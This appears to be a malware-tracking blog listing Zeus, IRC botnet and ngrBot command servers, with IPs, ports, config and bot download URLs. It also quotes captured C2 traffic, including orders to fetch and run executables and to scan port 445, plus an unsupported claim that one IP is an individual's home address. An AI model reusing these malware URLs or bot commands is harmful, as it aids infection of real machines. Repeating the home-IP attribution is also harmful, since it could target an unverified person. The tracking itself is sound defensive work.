kjrub.com(zeus banking trojan hosted in United States Hostdime.com Inc)

Uncategorized

isreali hecker using zeus botnet and rat kjrub.no-ip.org 46.120.170.54 this is home ip for sure Outgoing connection to remote server: kjrub.no-ip.org TCP port 101 Outgoing connection to remote server: kjrub.no-ip.org TCP port 99 Outgoing connection to remote server: kjrub.no-ip.org TCP port 1604 kjrub.com kjrub.com 64.37.52.109 Opened listening TCP connection on port: 39698 Download URLs http://64.37.52.109/Zeus/config.binRead more...

itconsorcium.me(zeus banking trojan hosted in Netherlands Amsterdam Leaseweb B.v)

Uncategorized

itconsorcium.me itconsorcium.me 85.17.65.10 Opened listening TCP connection on port: 39231Download URLs http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://kenney.cz.cc/system-updates/bot.exe Outgoing connection to remote server: itconsorcium.me TCP port 80 Outgoing connection to remote server: itconsorcium.me TCP port 80 hosting infos: http://whois.domaintools.com/85.17.65.10

205.134.246.98(irc botnet hosted in United States Arlington Gamedata Inc)

Uncategorized

Remote Host Port Number 205.134.246.98 9090 PASS prison 216.146.38.70 80 72.233.89.200 80 PRIVMSG {00-USA-XP-COMP-` =~@ :HTTP SET http://68.173.251.107/x.exe =~@ :SC// Sequential Port Scan started on 174.133.89.0:445 with a delay of 10 seconds for 0 minutes using 100 threads. PONG leaf.18632.com NICK {iNF-00-USA-XP-COMP-4138} USER MEAT * 0 :COMP JOIN ##hxxp## NICK {00-USA-XP-COMP-3086} JOIN ###meat hosting infos:Read more...

3vbot.no-ip.info(irc botnet hosted in Germany Hetzner Online Ag)

Uncategorized

sexykyle.no-ip.biz Resolved : [ sexykyle.no-ip.biz ] To [ 178.63.140.212 ] Remote Host Port Number 178.63.140.212 1997 PASS none NICK NEW{USA-XP-SP3}{946345} USER 9463 “” “TsGh” :9463 JOIN #testbot PONG :irc.L1GhTs.net NICK New{US-XP-x86}5635115 USER 5635115 “” “5635115” :5635115 MODE New{US-XP-x86}5635115 +iMm JOIN #aryan none PONG :irc.L1GhTs.net hosting infos: http://whois.domaintools.com/178.63.140.212

92.241.165.155(ngrBot hosted in Russian Federation Oao Webalta)

Uncategorized

Remote Host Port Number 213.251.170.52 80 92.241.165.155 1863 PASS ngrBot NICK n{US|XPa}rwtnhzp USER rwtnhzp 0 0 :rwtnhzp JOIN #IrcPeru PeruRulz!! Update: NICK n{US|XPa}fnazajf USER fnazajf 0 0 :fnazajf JOIN #IrcPeru PeruRulz!! PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s) PRIVMSG #IrcPeru :[d=”http://wootryp.com/images/quote.swf.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – DownloadRead more...